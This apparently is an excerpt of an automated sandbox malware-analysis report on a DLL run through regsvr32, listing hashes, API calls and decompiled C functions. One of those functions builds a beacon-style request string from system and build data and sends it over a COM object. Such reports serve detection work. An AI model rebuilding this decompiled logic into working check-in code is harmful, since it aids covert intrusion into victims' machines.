                                    0x00000000
                                    0x001a80cf
                                    0x001a80d1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a80d1
                                    0x001a8096
                                    0x001a8098
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 001A8106
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: MemoryQueryVirtual
                                    • String ID:
                                    • API String ID: 2850889275-0
                                    • Opcode ID: f3ae2a9994028bef5c26628c9ef1ee3df2501f08ee193ea2cef83a8a7cd82153
                                    • Instruction ID: 173e9af280c3d2d00d0bfaa59ccaf97044773e9a86ef9a566bfe9eda8a064056
                                    • Opcode Fuzzy Hash: f3ae2a9994028bef5c26628c9ef1ee3df2501f08ee193ea2cef83a8a7cd82153
                                    • Instruction Fuzzy Hash: 2D61D138A00A029FDF29CF29C99077973A6FF97354B24853AE852C7694EF31DC86C650
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A2274, Relevance: .1, Instructions: 77COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 71%
                                    			E6E2A2274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E2A23DB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E2A2495(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E2A2380(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E2A23DB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E2A2477(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                    0x6e2a2278
                                    0x6e2a2279
                                    0x6e2a227a
                                    0x6e2a227d
                                    0x6e2a227f
                                    0x6e2a2282
                                    0x6e2a2283
                                    0x6e2a2285
                                    0x6e2a2286
                                    0x6e2a2287
                                    0x6e2a228a
                                    0x6e2a2294
                                    0x6e2a2345
                                    0x6e2a234c
                                    0x6e2a2355
                                    0x6e2a229a
                                    0x6e2a229a
                                    0x6e2a22a0
                                    0x6e2a22a6
                                    0x6e2a22a9
                                    0x6e2a22ac
                                    0x6e2a22b0
                                    0x6e2a22b5
                                    0x6e2a22ba
                                    0x6e2a233a
                                    0x00000000
                                    0x6e2a22bc
                                    0x6e2a22bc
                                    0x6e2a22c8
                                    0x6e2a22ca
                                    0x6e2a2325
                                    0x6e2a2325
                                    0x6e2a232b
                                    0x00000000
                                    0x6e2a22cc
                                    0x6e2a22db
                                    0x6e2a22dd
                                    0x6e2a22de
                                    0x6e2a22df
                                    0x6e2a22e2
                                    0x6e2a22e2
                                    0x6e2a22e4
                                    0x00000000
                                    0x6e2a22e6
                                    0x6e2a22e6
                                    0x6e2a2330
                                    0x6e2a22e8
                                    0x6e2a22e8
                                    0x6e2a22ec
                                    0x6e2a22f4
                                    0x6e2a22f9
                                    0x6e2a22fe
                                    0x6e2a230a
                                    0x6e2a2312
                                    0x6e2a2319
                                    0x6e2a231f
                                    0x6e2a2323
                                    0x00000000
                                    0x6e2a2323
                                    0x6e2a22e6
                                    0x6e2a22e4
                                    0x00000000
                                    0x6e2a22ca
                                    0x6e2a233e
                                    0x6e2a233e
                                    0x6e2a233e
                                    0x6e2a22ba
                                    0x6e2a235a
                                    0x6e2a2361

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                    • Instruction ID: 10bd9ad8db7ec40c4c31837bf4a497ad22deafe36621561c37257f4c51c7f252
                                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                    • Instruction Fuzzy Hash: 3A21C8B79002099FD700DFADC8C09ABB7AAFF49350B4585A8DA559B245DB30FA15C7E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A7E30, Relevance: .1, Instructions: 77COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 71%
                                    			E001A7E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E001A7F9B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E001A8055(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E001A7F40(_t55, _t66);
										_t89 = _t66 + 0x10;
										E001A7F9B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E001A8037(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                    0x001a7e34
                                    0x001a7e35
                                    0x001a7e36
                                    0x001a7e39
                                    0x001a7e3b
                                    0x001a7e3e
                                    0x001a7e3f
                                    0x001a7e41
                                    0x001a7e42
                                    0x001a7e43
                                    0x001a7e46
                                    0x001a7e50
                                    0x001a7f01
                                    0x001a7f08
                                    0x001a7f11
                                    0x001a7e56
                                    0x001a7e56
                                    0x001a7e5c
                                    0x001a7e62
                                    0x001a7e65
                                    0x001a7e68
                                    0x001a7e6c
                                    0x001a7e71
                                    0x001a7e76
                                    0x001a7ef6
                                    0x00000000
                                    0x001a7e78
                                    0x001a7e78
                                    0x001a7e84
                                    0x001a7e86
                                    0x001a7ee1
                                    0x001a7ee1
                                    0x001a7ee7
                                    0x00000000
                                    0x001a7e88
                                    0x001a7e97
                                    0x001a7e99
                                    0x001a7e9a
                                    0x001a7e9b
                                    0x001a7e9e
                                    0x001a7e9e
                                    0x001a7ea0
                                    0x00000000
                                    0x001a7ea2
                                    0x001a7ea2
                                    0x001a7eec
                                    0x001a7ea4
                                    0x001a7ea4
                                    0x001a7ea8
                                    0x001a7eb0
                                    0x001a7eb5
                                    0x001a7eba
                                    0x001a7ec6
                                    0x001a7ece
                                    0x001a7ed5
                                    0x001a7edb
                                    0x001a7edf
                                    0x00000000
                                    0x001a7edf
                                    0x001a7ea2
                                    0x001a7ea0
                                    0x00000000
                                    0x001a7e86
                                    0x001a7efa
                                    0x001a7efa
                                    0x001a7efa
                                    0x001a7e76
                                    0x001a7f16
                                    0x001a7f1d

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                    • Instruction ID: 487d14da174627030120d1ca316f0cef0a06969c5813f6c3dd974ecff4d55d90
                                    • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                    • Instruction Fuzzy Hash: 5421B676904204AFCB14EF68CCC09ABBBA5FF46350B0685A8ED158B285E730FE15C7E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2F80E6, Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674637577.000000006E2F8000.00000040.00020000.sdmp, Offset: 6E2F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2f8000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                    • Instruction ID: 17368a3a383d81e5ed6e08c951824cee96d1ff4fdfd9749a5ff9b857892ea14a
                                    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                    • Instruction Fuzzy Hash: DF1172773801099FD758CE9ADC91E97F3DAEB89620B198159ED04CB301E676E84286A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2F84DF, Relevance: .1, Instructions: 55COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674637577.000000006E2F8000.00000040.00020000.sdmp, Offset: 6E2F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2f8000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                    • Instruction ID: e344c2d998f28ec448d665be57d8aa43dc5331efaa0458920fffbccec4361f4c
                                    • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                    • Instruction Fuzzy Hash: F801C47239820ACFD74CCF6ED994E6AFBE5EBC2726B16807EC44687615D230E846C911
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A323C, Relevance: 33.3, APIs: 22, Instructions: 262memorystringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E001A323C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x1aa018; // 0xd0e4fb36
				asm("bswap eax");
				_t65 =  *0x1aa014; // 0xf7f8bd56
				asm("bswap eax");
				_t66 =  *0x1aa010; // 0xe67532f
				asm("bswap eax");
				_t67 =  *0x1aa00c; // 0x73a6f34e
				asm("bswap eax");
				_t68 =  *0x1aa2d4; // 0x314d7d0
				_t3 = _t68 + 0x1ab622; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0x1aa02c,  *0x1aa004, _t63);
				_t71 = E001A4155();
				_t72 =  *0x1aa2d4; // 0x314d7d0
				_t4 = _t72 + 0x1ab662; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x1aa2d4; // 0x314d7d0
					_t8 = _t139 + 0x1ab66d; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E001A35BC(_t144);
				_t77 =  *0x1aa2d4; // 0x314d7d0
				_t10 = _t77 + 0x1ab38a; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x1aa2d4; // 0x314d7d0
				_t12 = _t81 + 0x1ab7b4; // 0x32f8f84
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x1ab33b; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x1aa31c; // 0x32f9808
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x1aa2d4; // 0x314d7d0
					_t18 = _t135 + 0x1ab8e9; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x1aa32c; // 0x32f97d8
				if(_t86 != 0) {
					_t132 =  *0x1aa2d4; // 0x314d7d0
					_t20 = _t132 + 0x1ab685; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x1aa37c; // 0x32f9858
				_t88 = E001A49BA(0x1aa00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x1aa290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x1aa290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x1aa290, _t167, _v12);
						goto L28;
					}
					E001A3D0C(GetTickCount());
					_t95 =  *0x1aa37c; // 0x32f9858
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x1aa37c; // 0x32f9858
					__imp__(_t99 + 0x40);
					_t101 =  *0x1aa37c; // 0x32f9858
					_t163 = E001A637D(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x1aa290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x1a92ac);
					_push(_t163);
					_t107 = E001A7067();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x1aa290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E001A5691( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E001A454A();
						L24:
						HeapFree( *0x1aa290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E001A656F(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E001A211F(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E001A77EC(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E001A75F0(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E001A77EC(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}


























































                                    0x001a323c
                                    0x001a323c
                                    0x001a323c
                                    0x001a3245
                                    0x001a324a
                                    0x001a3251
                                    0x001a3253
                                    0x001a3253
                                    0x001a3260
                                    0x001a326b
                                    0x001a326e
                                    0x001a3279
                                    0x001a327c
                                    0x001a3281
                                    0x001a3284
                                    0x001a3289
                                    0x001a328c
                                    0x001a3298
                                    0x001a32a5
                                    0x001a32a7
                                    0x001a32ad
                                    0x001a32b2
                                    0x001a32bd
                                    0x001a32bf
                                    0x001a32c2
                                    0x001a32c8
                                    0x001a32ca
                                    0x001a32d2
                                    0x001a32dd
                                    0x001a32df
                                    0x001a32e2
                                    0x001a32e2
                                    0x001a32e4
                                    0x001a32eb
                                    0x001a32f0
                                    0x001a32fd
                                    0x001a32ff
                                    0x001a3304
                                    0x001a330c
                                    0x001a330f
                                    0x001a3315
                                    0x001a3320
                                    0x001a3322
                                    0x001a3327
                                    0x001a332c
                                    0x001a332f
                                    0x001a3334
                                    0x001a333f
                                    0x001a3341
                                    0x001a3344
                                    0x001a3344
                                    0x001a3346
                                    0x001a334d
                                    0x001a3350
                                    0x001a3355
                                    0x001a335f
                                    0x001a3361
                                    0x001a3361
                                    0x001a3364
                                    0x001a3372
                                    0x001a3377
                                    0x001a337b
                                    0x001a337e
                                    0x001a3548
                                    0x001a3550
                                    0x001a355d
                                    0x001a3384
                                    0x001a3390
                                    0x001a3398
                                    0x001a339b
                                    0x001a3538
                                    0x001a3542
                                    0x00000000
                                    0x001a3542
                                    0x001a33a7
                                    0x001a33ac
                                    0x001a33b5
                                    0x001a33c6
                                    0x001a33ca
                                    0x001a33d3
                                    0x001a33d9
                                    0x001a33e6
                                    0x001a33ed
                                    0x001a33f6
                                    0x001a33fc
                                    0x001a3528
                                    0x001a3532
                                    0x00000000
                                    0x001a3532
                                    0x001a3408
                                    0x001a340e
                                    0x001a340f
                                    0x001a3416
                                    0x001a3419
                                    0x001a351a
                                    0x001a3522
                                    0x00000000
                                    0x001a3522
                                    0x001a3422
                                    0x001a3428
                                    0x001a3431
                                    0x001a343a
                                    0x001a3445
                                    0x001a344c
                                    0x001a344f
                                    0x001a3560
                                    0x001a3502
                                    0x001a3502
                                    0x001a3507
                                    0x001a3512
                                    0x001a3518
                                    0x00000000
                                    0x001a3518
                                    0x001a3459
                                    0x001a3460
                                    0x001a3463
                                    0x001a3468
                                    0x001a3478
                                    0x001a347b
                                    0x001a3481
                                    0x001a3487
                                    0x001a348d
                                    0x001a3490
                                    0x001a3496
                                    0x001a3499
                                    0x001a349e
                                    0x001a34a2
                                    0x001a34a2
                                    0x001a34ae
                                    0x001a34ba
                                    0x001a34be
                                    0x001a34c0
                                    0x001a34c5
                                    0x001a34c7
                                    0x001a34cc
                                    0x001a34d1
                                    0x001a34de
                                    0x001a34e6
                                    0x001a34e9
                                    0x001a34e9
                                    0x001a34c5
                                    0x00000000
                                    0x001a34b0
                                    0x001a34b4
                                    0x001a34eb
                                    0x001a34ee
                                    0x001a34f7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a34f7
                                    0x001a34b6
                                    0x00000000
                                    0x001a34b6
                                    0x001a34ae

                                    APIs
                                    • GetTickCount.KERNEL32(?), ref: 001A3253
                                    • wsprintfA.USER32 ref: 001A32A0
                                    • wsprintfA.USER32 ref: 001A32BD
                                    • wsprintfA.USER32 ref: 001A32DD
                                    • wsprintfA.USER32 ref: 001A32FB
                                    • wsprintfA.USER32 ref: 001A331E
                                    • wsprintfA.USER32 ref: 001A333F
                                    • wsprintfA.USER32 ref: 001A335F
                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001A3390
                                    • GetTickCount.KERNEL32 ref: 001A33A1
                                    • RtlEnterCriticalSection.NTDLL(032F9818), ref: 001A33B5
                                    • RtlLeaveCriticalSection.NTDLL(032F9818), ref: 001A33D3
                                      • Part of subcall function 001A637D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63A8
                                      • Part of subcall function 001A637D: lstrlen.KERNEL32(00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63B0
                                      • Part of subcall function 001A637D: strcpy.NTDLL ref: 001A63C7
                                      • Part of subcall function 001A637D: lstrcat.KERNEL32(00000000,00000000), ref: 001A63D2
                                      • Part of subcall function 001A637D: StrTrimA.SHLWAPI(00000000,=), ref: 001A63EF
                                    • StrTrimA.SHLWAPI(00000000,001A92AC), ref: 001A3408
                                      • Part of subcall function 001A7067: lstrlen.KERNEL32(032F8AA2,00000000,00000000,00000000,001A730A,00000000), ref: 001A7077
                                      • Part of subcall function 001A7067: lstrlen.KERNEL32(?), ref: 001A707F
                                      • Part of subcall function 001A7067: lstrcpy.KERNEL32(00000000,032F8AA2), ref: 001A7093
                                      • Part of subcall function 001A7067: lstrcat.KERNEL32(00000000,?), ref: 001A709E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 001A3428
                                    • lstrcat.KERNEL32(00000000,?), ref: 001A343A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A3440
                                      • Part of subcall function 001A5691: lstrlen.KERNEL32(?,00000000,032F9F00,754B94D8,001A291A,032FA0FD,001A5FB9,001A5FB9,?,001A5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 001A5698
                                      • Part of subcall function 001A5691: mbstowcs.NTDLL ref: 001A56C1
                                      • Part of subcall function 001A5691: memset.NTDLL ref: 001A56D3
                                      • Part of subcall function 001A656F: CoCreateInstance.OLE32(0002DF01,00000000,00000004,032F8828,00000000), ref: 001A659D
                                    • wcstombs.NTDLL ref: 001A34D1
                                      • Part of subcall function 001A211F: SysAllocString.OLEAUT32(00000000), ref: 001A2160
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 001A3512
                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001A3522
                                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 001A3532
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A3542
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A3550
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateCreateEnterInstanceLeaveStringmbstowcsmemsetstrcpywcstombs
                                    • String ID:
                                    • API String ID: 3915760265-0
                                    • Opcode ID: 44f01c48f23ece43ca1c1816cf571bb44661a8141ee7b9de8dccf5772bf11566
                                    • Instruction ID: 4be3170f06870bc6cfdb88031d7bd7c9359aa3abea929ac687efe32445f9a19b
                                    • Opcode Fuzzy Hash: 44f01c48f23ece43ca1c1816cf571bb44661a8141ee7b9de8dccf5772bf11566
                                    • Instruction Fuzzy Hash: 74A18D75900209AFCB12DFA8DD88FAA3BB9FF4A350F144025F909C7661D735DA94CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C8F41, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 6E2C8F85
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA354
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA366
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA378
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA38A
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA39C
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3AE
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3C0
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3D2
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3E4
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3F6
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA408
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA41A
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA42C
                                    • _free.LIBCMT ref: 6E2C8F7A
                                      • Part of subcall function 6E2C761D: HeapFree.KERNEL32(00000000,00000000), ref: 6E2C7633
                                      • Part of subcall function 6E2C761D: GetLastError.KERNEL32(?,?,6E2CA4CC,?,00000000,?,00000000,?,6E2CA4F3,?,00000007,?,?,6E2C90D9,?,?), ref: 6E2C7645
                                    • _free.LIBCMT ref: 6E2C8F9C
                                    • _free.LIBCMT ref: 6E2C8FB1
                                    • _free.LIBCMT ref: 6E2C8FBC
                                    • _free.LIBCMT ref: 6E2C8FDE
